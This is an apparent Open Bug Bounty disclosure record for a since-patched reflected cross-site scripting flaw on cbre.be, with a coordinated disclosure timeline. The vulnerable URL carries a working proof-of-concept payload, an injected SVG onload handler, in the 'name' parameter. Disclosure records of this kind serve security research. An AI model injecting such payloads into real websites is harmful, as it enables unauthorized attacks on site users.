cbre.be XSS vulnerability

2015-11-18T06:09:00
ID OBB:107644
Type openbugbounty
Reporter Spam404
Modified 2017-07-26T09:38:00

Description

Vulnerable URL:
http://www.cbre.be/uk_land_sales/properties/search_results_uknew?name=%22%3E%3Csvg/onload=prompt%28/XSSPOSED/%29%3E&selCode;=null&regionCode;=null&cityCode;=null&sizeMin;=null&sizeMax;=null&addedProperty;=null&mapView;=N&uomlCode;=null&curCode;=null&orderBy;=null&display;=25&p;_pageGroup=uk_land_sales&p;_page=favorites&p;_action=null&sessionId;=3c0252b144c9aa3054c0faf138c88c6544c89a00b916bf497e852b4bebb2673e&pager;_offset=null&prlAslCode;=null&prlTnlCode;=null
Details:

Description| Value
---|---
Patched:| Yes, at 26.07.2017
Latest check for patch:| 26.07.2017 09:38 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 3587161
Google Pagerank| 5
VIP website status:| No
Check cbre.be SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 18 November, 2015 06:09 GMT
Vulnerability existence verified and confirmed| 18 November, 2015 06:11 GMT
Vulnerability patched by the website owner| 26 July, 2017 09:38 GMT